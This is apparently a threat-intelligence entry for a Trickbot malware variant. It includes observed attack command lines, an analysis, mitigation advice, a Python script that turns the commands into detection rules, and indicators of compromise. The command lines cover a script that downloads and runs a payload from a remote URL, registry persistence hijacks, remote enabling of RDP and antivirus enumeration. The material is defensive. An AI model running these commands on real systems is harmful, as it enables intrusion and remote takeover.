Trickbot Gtag QW1
Description
%WINDIR%\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat
cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\DiskDrive\1\Volume\BackFiles\Jofert.exe
powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe'
%WINDIR%\system32\cmd[.]exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
%WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f
reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f
reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
"%WINDIR%\system32\cmd[.]exe" /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe
"%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
%WINDIR%\system32\cmd[.]exe /C reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
%WINDIR%\system32\cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
AI Analysis
Technical Summary
The Trickbot Gtag QW1 is a malware variant associated with the Trickbot family, known for its modular banking Trojan capabilities and use in multi-stage attack campaigns. The provided command sequence indicates that the malware executes a batch script (errorfix.bat) and a VBScript (pinumber.vbs) from a local disk path, followed by downloading and executing an external payload (QW1.exe) from a suspicious URL. It also runs a secondary executable (Jofert.exe) via PowerShell after a short delay, suggesting staged execution to evade detection. The malware manipulates Windows Registry keys under HKEY_CURRENT_USER\Software\Classes to hijack the AppX protocol handler, setting the 'DelegateExecute' value to an empty string and modifying the shell open command to launch a suspicious executable located in the All Users profile directory with a non-ASCII filename. This technique is indicative of persistence and execution hijacking to maintain a foothold and evade user detection. Additionally, the malware sets the Terminal Server registry value fDenyTSConnections to 0, effectively enabling Remote Desktop Protocol (RDP) connections, which could facilitate lateral movement or remote access by attackers; one of the listed commands writes this value to the registry of a remote host (\\usha-bdc) rather than the local machine. The use of WMIC commands querying installed antivirus products suggests reconnaissance to identify security software presence, potentially to disable or evade it. The malware does not have an associated patch or known exploits in the wild, and its severity is currently rated low by the source. However, the presence of Cobalt Strike beacon tags indicates that this malware may be used as a delivery mechanism for advanced post-exploitation frameworks, increasing its threat potential. Overall, Trickbot Gtag QW1 employs multiple persistence, execution hijacking, and reconnaissance techniques to establish and maintain access on compromised Windows systems.
Potential Impact
For European organizations, Trickbot Gtag QW1 poses a significant risk primarily through its capability to establish persistent access and enable remote control via RDP. This can lead to unauthorized data access, lateral movement within networks, and potential deployment of additional payloads such as ransomware or information stealers. The malware’s ability to disable or evade antivirus detection increases the likelihood of prolonged undetected presence, which can compromise confidentiality and integrity of sensitive data. Organizations with exposed RDP services or insufficient endpoint protection are particularly vulnerable. The manipulation of registry keys and use of obscure filenames complicate detection and remediation efforts. Given Trickbot’s historical use in financially motivated attacks and espionage, sectors such as finance, critical infrastructure, and government entities in Europe could face targeted attacks resulting in data breaches, operational disruption, and financial losses. The malware’s low initial severity rating may underestimate its potential as a foothold for more damaging follow-on attacks, especially in environments lacking robust monitoring and incident response capabilities.
Mitigation Recommendations
1. Restrict and monitor RDP access: Disable unnecessary RDP services or restrict them via VPNs and strong authentication mechanisms such as multi-factor authentication (MFA).
2. Implement application whitelisting to prevent execution of unauthorized scripts and executables, particularly those launched from unusual directories or with non-standard filenames.
3. Monitor and alert on suspicious registry modifications, especially under HKEY_CURRENT_USER\Software\Classes and Terminal Server keys, to detect persistence and remote access enabling attempts.
4. Employ endpoint detection and response (EDR) solutions capable of behavioral analysis to identify staged execution patterns and PowerShell abuse.
5. Conduct regular threat hunting for indicators of Trickbot activity, including unusual network connections to known command and control domains or IPs.
6. Harden systems by disabling legacy scripting hosts (e.g., cscript) where not required and restricting execution of scripts from user directories.
7. Maintain up-to-date threat intelligence feeds to identify emerging Trickbot variants and associated infrastructure.
8. Educate users on phishing and social engineering tactics commonly used to deliver Trickbot payloads, as initial infection vectors often involve user interaction.
9. Segment networks to limit lateral movement opportunities if compromise occurs.
10. Regularly back up critical data and verify recovery procedures to mitigate impact of potential ransomware deployment following Trickbot infection.
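Recommendations 3 and 4 above call for alerting on the registry writes and the staged PowerShell launch seen in this event. The following is an added example of how such rules look when run over process-creation command lines; it is not part of this report or of any vendor product. The suspicious sample lines are copied from the IoC list on this page (the non-ASCII executable name is replaced by the placeholder `placeholder.exe`, and `usha-bdc` is the remote host from the IoC list), and the two benign lines are constructed to show that the rules do not fire on an administrator disabling RDP or changing an ordinary file association.

```python
import re
from typing import Dict, List

# Constructed sample process-creation log entries (command-line field only).
# The first six are taken from the IoC list on this page (the non-ASCII
# executable name is replaced by the placeholder "placeholder.exe"); the last
# two are constructed benign administrative commands that must NOT be flagged.
SAMPLE_LOG: List[str] = [
    r'%WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f',
    r'reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\placeholder.exe" /f',
    r'"%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List',
    r"powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe'",
    # benign (constructed): an administrator turning RDP OFF (value 1) touches the same key
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f',
    # benign (constructed): an ordinary file-association change under HKCU\Software\Classes
    r'reg add HKEY_CURRENT_USER\Software\Classes\txtfile\shell\open\command /t REG_SZ /d "notepad.exe %1" /f',
]

# Detection rules, one per behaviour described in the analysis above.
# Each pattern is kept narrow so it does not fire on routine administration.
RULES = [
    # Writes to the AppX... ProgID's shell\open\command (DelegateExecute or default value)
    ("appx-shell-open-command-hijack",
     re.compile(r"reg(?:\.exe)?\"?\s+add\s+\"?(?:HKEY_CURRENT_USER|HKCU)\\Software\\Classes\\AppX[0-9a-z]+\\shell\\open\\command",
                re.IGNORECASE)),
    # fDenyTSConnections explicitly set to 0 (RDP enabled), in the local or a remote registry
    ("rdp-enabled-via-registry",
     re.compile(r"Terminal Server\"?\s+/v\s+fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0\b",
                re.IGNORECASE)),
    # WMI query of installed AV products through the SecurityCenter2 namespace
    ("av-enumeration-securitycenter2",
     re.compile(r"\\root\\SecurityCenter2\b.*\bAntiVirusProduct\b", re.IGNORECASE)),
    # PowerShell sleep followed by Start-Process (or its alias Saps): delayed, staged launch
    ("delayed-start-process",
     re.compile(r"powershell(?:\.exe)?\s+-C(?:ommand)?\s+Sleep\b.*;\s*(?:Saps|Start-Process)\b",
                re.IGNORECASE)),
]


def registry_target(line: str) -> str:
    r"""Return the host named in a \\host\HKLM-style remote registry path, else 'localhost'."""
    m = re.search(r'\\\\([^\\"\s]+)\\HK', line)
    return m.group(1) if m else "localhost"


def scan_lines(lines: List[str]) -> List[Dict[str, str]]:
    """Apply every rule to every line; one finding per (rule, line) match, in log order."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append({"rule": name, "target": registry_target(line), "line": line})
    return findings


def count_by_rule(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Summarise findings as {rule name: number of matching lines}."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"[{f['rule']}] target={f['target']} :: {f['line'][:90]}")
```

The `target` field matters for triage: a `fDenyTSConnections=0` write whose path starts with `\\host\HKLM` means the compromised machine is enabling RDP on another host over the remote registry service, so the alert should be raised against that host as well as the source.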
Affected Countries
Germany, United Kingdom, France, Italy, Netherlands, Poland, Spain, Belgium
Indicators of Compromise
- text: %WINDIR%\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat
- text: cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\DiskDrive\1\Volume\BackFiles\Jofert.exe
- text: powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe'
- text: %WINDIR%\system32\cmd[.]exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
- text: %WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f
- text: reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f
- text: reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
- text: "%WINDIR%\system32\cmd[.]exe" /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe
- text: cmd.exe /c net config workstation
- text: cmd.exe /c ipconfig /all
- text: cmd.exe /c net view /all
- text: cmd.exe /c net view /all /domain
- text: cmd.exe /c nltest /domain_trusts /all_trusts
- text: "%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- text: %WINDIR%\system32\cmd[.]exe /C reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- text: reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- text: %WINDIR%\system32\cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
- text: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
- ip: 95.179.210.8
- ip: 50.87.170.67
- url: https://serviceuphelper.com:80/avxbDFb
- url: http://customscripts.us/QW1.exe
- domain: customscripts.us
- domain: serviceuphelper.com
- url: http://64.44.133.131/images/cursor.png
- link: https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/
- malware-sample: Jofert.exe|b17e4833c580bbd343a1834be0e2a65f
- file: Jofert.exe
- hash: b17e4833c580bbd343a1834be0e2a65f
- hash: 7ad2d4c4fe0efd021992391fcdb7e630a19f23f6
- hash: 5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe
- size-in-bytes: 385024
- malware-sample: errorfix.bat|4368db27ef2f07171c2c13d2e537d459
- file: errorfix.bat
- hash: 4368db27ef2f07171c2c13d2e537d459
- hash: 7993ebdea9421a85b431077b2d89ee3344180759
- hash: 17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a
- size-in-bytes: 2864
- malware-sample: invoice.doc|d627615f955dd5342ef6b4c6938ad98c
- file: invoice.doc
- hash: d627615f955dd5342ef6b4c6938ad98c
- hash: 645467b3207a50c43be075a0b81308a5f6935c59
- hash: 1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f
- size-in-bytes: 441560
Technical Details
- Threat Level: 3
- Analysis: 0
- Uuid: 5e6793ed-2868-4474-a485-42210a0a020f
- Original Timestamp: 1621850731
Threat ID: 682c7adfe3e6de8ceb7795ae
Added to database: 5/20/2025, 12:51:43 PM
Last enriched: 6/19/2025, 2:19:49 PM
Last updated: 7/31/2025, 12:25:54 PM
Views: 9